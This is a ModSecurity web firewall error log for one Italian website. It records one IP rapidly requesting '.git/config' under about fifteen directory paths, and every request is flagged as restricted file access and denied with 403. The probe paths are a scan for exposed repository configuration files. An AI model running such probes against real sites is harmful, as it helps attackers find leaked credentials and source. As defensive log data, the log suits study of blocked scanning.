[Thu May 23 21:50:58.616105 2024] [:error] [pid 3413214] [client 104.234.204.32:45736] [client 104.234.204.32] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/private/.git/config"] [unique_id "Zk-eIpzctTAUN3VLWY6UGAAAAAQ"]
[Thu May 23 21:50:58.616321 2024] [:error] [pid 3413214] [client 104.234.204.32:45736] [client 104.234.204.32] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/private/.git/config"] [unique_id "Zk-eIpzctTAUN3VLWY6UGAAAAAQ"]
[Thu May 23 21:50:58.690561 2024] [:error] [pid 3413213] [client 104.234.204.32:45754] [client 104.234.204.32] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /public/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/public/.git/config"] [unique_id "Zk-eIkRtqfe68Tkm9lTptQAAAAM"]
[Thu May 23 21:50:58.690762 2024] [:error] [pid 3413213] [client 104.234.204.32:45754] [client 104.234.204.32] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/public/.git/config"] [unique_id "Zk-eIkRtqfe68Tkm9lTptQAAAAM"]
[Thu May 23 21:50:58.690916 2024] [:error] [pid 3413213] [client 104.234.204.32:45754] [client 104.234.204.32] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/public/.git/config"] [unique_id "Zk-eIkRtqfe68Tkm9lTptQAAAAM"]
[Thu May 23 21:50:58.733383 2024] [:error] [pid 3413210] [client 104.234.204.32:45776] [client 104.234.204.32] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /repository/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/repository/.git/config"] [unique_id "Zk-eImikoYj9w0kALAhtSAAAAAA"]
[Thu May 23 21:50:58.733613 2024] [:error] [pid 3413210] [client 104.234.204.32:45776] [client 104.234.204.32] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/repository/.git/config"] [unique_id "Zk-eImikoYj9w0kALAhtSAAAAAA"]
[Thu May 23 21:50:58.733778 2024] [:error] [pid 3413210] [client 104.234.204.32:45776] [client 104.234.204.32] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/repository/.git/config"] [unique_id "Zk-eImikoYj9w0kALAhtSAAAAAA"]
[Thu May 23 21:50:58.735554 2024] [:error] [pid 3431459] [client 104.234.204.32:45768] [client 104.234.204.32] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /repos/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/repos/.git/config"] [unique_id "Zk-eIqMCX2cQI6F9CPFGIwAAAAs"]
[Thu May 23 21:50:58.735789 2024] [:error] [pid 3431459] [client 104.234.204.32:45768] [client 104.234.204.32] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/repos/.git/config"] [unique_id "Zk-eIqMCX2cQI6F9CPFGIwAAAAs"]
[Thu May 23 21:50:58.735937 2024] [:error] [pid 3431459] [client 104.234.204.32:45768] [client 104.234.204.32] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/repos/.git/config"] [unique_id "Zk-eIqMCX2cQI6F9CPFGIwAAAAs"]
[Thu May 23 21:50:58.737665 2024] [:error] [pid 3431458] [client 104.234.204.32:45766] [client 104.234.204.32] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /qa/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/qa/.git/config"] [unique_id "Zk-eIsZCjO8xFVbueecAmwAAAAo"]
[Thu May 23 21:50:58.738365 2024] [:error] [pid 3431458] [client 104.234.204.32:45766] [client 104.234.204.32] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/qa/.git/config"] [unique_id "Zk-eIsZCjO8xFVbueecAmwAAAAo"]
[Thu May 23 21:50:58.738843 2024] [:error] [pid 3431458] [client 104.234.204.32:45766] [client 104.234.204.32] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/qa/.git/config"] [unique_id "Zk-eIsZCjO8xFVbueecAmwAAAAo"]
[Thu May 23 21:50:58.794926 2024] [:error] [pid 3413211] [client 104.234.204.32:45786] [client 104.234.204.32] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /resources/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/resources/.git/config"] [unique_id "Zk-eIvWGyBPySR9VLpy1lgAAAAE"]
[Thu May 23 21:50:58.795365 2024] [:error] [pid 3413433] [client 104.234.204.32:45802] [client 104.234.204.32] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /samples/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/samples/.git/config"] [unique_id "Zk-eIjaPQQ881d8bAu5nRgAAAAY"]
[Thu May 23 21:50:58.795388 2024] [:error] [pid 3413211] [client 104.234.204.32:45786] [client 104.234.204.32] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/resources/.git/config"] [unique_id "Zk-eIvWGyBPySR9VLpy1lgAAAAE"]
[Thu May 23 21:50:58.795792 2024] [:error] [pid 3413211] [client 104.234.204.32:45786] [client 104.234.204.32] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/resources/.git/config"] [unique_id "Zk-eIvWGyBPySR9VLpy1lgAAAAE"]
[Thu May 23 21:50:58.795852 2024] [:error] [pid 3413433] [client 104.234.204.32:45802] [client 104.234.204.32] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/samples/.git/config"] [unique_id "Zk-eIjaPQQ881d8bAu5nRgAAAAY"]
[Thu May 23 21:50:58.796257 2024] [:error] [pid 3413433] [client 104.234.204.32:45802] [client 104.234.204.32] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/samples/.git/config"] [unique_id "Zk-eIjaPQQ881d8bAu5nRgAAAAY"]
[Thu May 23 21:50:58.819528 2024] [:error] [pid 3431457] [client 104.234.204.32:45818] [client 104.234.204.32] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /script/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/script/.git/config"] [unique_id "Zk-eIsDLXjxS3Q8qbGS2kwAAAAk"]
[Thu May 23 21:50:58.820071 2024] [:error] [pid 3431457] [client 104.234.204.32:45818] [client 104.234.204.32] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/script/.git/config"] [unique_id "Zk-eIsDLXjxS3Q8qbGS2kwAAAAk"]
[Thu May 23 21:50:58.820452 2024] [:error] [pid 3431457] [client 104.234.204.32:45818] [client 104.234.204.32] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/script/.git/config"] [unique_id "Zk-eIsDLXjxS3Q8qbGS2kwAAAAk"]
[Thu May 23 21:50:58.823098 2024] [:error] [pid 3414898] [client 104.234.204.32:45800] [client 104.234.204.32] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /s3/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/s3/.git/config"] [unique_id "Zk-eItPWiUkCMq8Nf8lwrwAAAAg"]
[Thu May 23 21:50:58.823561 2024] [:error] [pid 3414898] [client 104.234.204.32:45800] [client 104.234.204.32] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/s3/.git/config"] [unique_id "Zk-eItPWiUkCMq8Nf8lwrwAAAAg"]
[Thu May 23 21:50:58.823875 2024] [:error] [pid 3414898] [client 104.234.204.32:45800] [client 104.234.204.32] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/s3/.git/config"] [unique_id "Zk-eItPWiUkCMq8Nf8lwrwAAAAg"]
[Thu May 23 21:50:58.827556 2024] [:error] [pid 3414863] [client 104.234.204.32:45868] [client 104.234.204.32] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /staging/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/staging/.git/config"] [unique_id "Zk-eIrlcUE7FzAkWB0OTsQAAAAc"]
[Thu May 23 21:50:58.827915 2024] [:error] [pid 3414863] [client 104.234.204.32:45868] [client 104.234.204.32] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/staging/.git/config"] [unique_id "Zk-eIrlcUE7FzAkWB0OTsQAAAAc"]
[Thu May 23 21:50:58.828186 2024] [:error] [pid 3414863] [client 104.234.204.32:45868] [client 104.234.204.32] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/staging/.git/config"] [unique_id "Zk-eIrlcUE7FzAkWB0OTsQAAAAc"]
[Thu May 23 21:50:58.840831 2024] [:error] [pid 3413215] [client 104.234.204.32:45858] [client 104.234.204.32] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /src/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/src/.git/config"] [unique_id "Zk-eIsTZAE7eF0447XNsvgAAAAU"]
[Thu May 23 21:50:58.841080 2024] [:error] [pid 3413215] [client 104.234.204.32:45858] [client 104.234.204.32] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/src/.git/config"] [unique_id "Zk-eIsTZAE7eF0447XNsvgAAAAU"]
[Thu May 23 21:50:58.841279 2024] [:error] [pid 3413215] [client 104.234.204.32:45858] [client 104.234.204.32] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/src/.git/config"] [unique_id "Zk-eIsTZAE7eF0447XNsvgAAAAU"]
[Thu May 23 21:50:58.843440 2024] [:error] [pid 3413214] [client 104.234.204.32:45846] [client 104.234.204.32] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /site/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/site/.git/config"] [unique_id "Zk-eIpzctTAUN3VLWY6UGQAAAAQ"]
[Thu May 23 21:50:58.844163 2024] [:error] [pid 3413214] [client 104.234.204.32:45846] [client 104.234.204.32] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/site/.git/config"] [unique_id "Zk-eIpzctTAUN3VLWY6UGQAAAAQ"]
[Thu May 23 21:50:58.844752 2024] [:error] [pid 3413214] [client 104.234.204.32:45846] [client 104.234.204.32] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/site/.git/config"] [unique_id "Zk-eIpzctTAUN3VLWY6UGQAAAAQ"]
[Thu May 23 21:50:58.912445 2024] [:error] [pid 3413213] [client 104.234.204.32:45840] [client 104.234.204.32] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /shop/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/shop/.git/config"] [unique_id "Zk-eIkRtqfe68Tkm9lTptgAAAAM"]
[Thu May 23 21:50:58.913120 2024] [:error] [pid 3413213] [client 104.234.204.32:45840] [client 104.234.204.32] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/shop/.git/config"] [unique_id "Zk-eIkRtqfe68Tkm9lTptgAAAAM"]
[Thu May 23 21:50:58.913612 2024] [:error] [pid 3413213] [client 104.234.204.32:45840] [client 104.234.204.32] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/shop/.git/config"] [unique_id "Zk-eIkRtqfe68Tkm9lTptgAAAAM"]
[Thu May 23 21:50:58.943671 2024] [:error] [pid 3413212] [client 104.234.204.32:45838] [client 104.234.204.32] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /settings/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/settings/.git/config"] [unique_id "Zk-eIvkOOvNcESBtKtopEgAAAAI"]
[Thu May 23 21:50:58.944192 2024] [:error] [pid 3413212] [client 104.234.204.32:45838] [client 104.234.204.32] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/settings/.git/config"] [unique_id "Zk-eIvkOOvNcESBtKtopEgAAAAI"]
[Thu May 23 21:50:58.944664 2024] [:error] [pid 3413212] [client 104.234.204.32:45838] [client 104.234.204.32] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/settings/.git/config"] [unique_id "Zk-eIvkOOvNcESBtKtopEgAAAAI"]
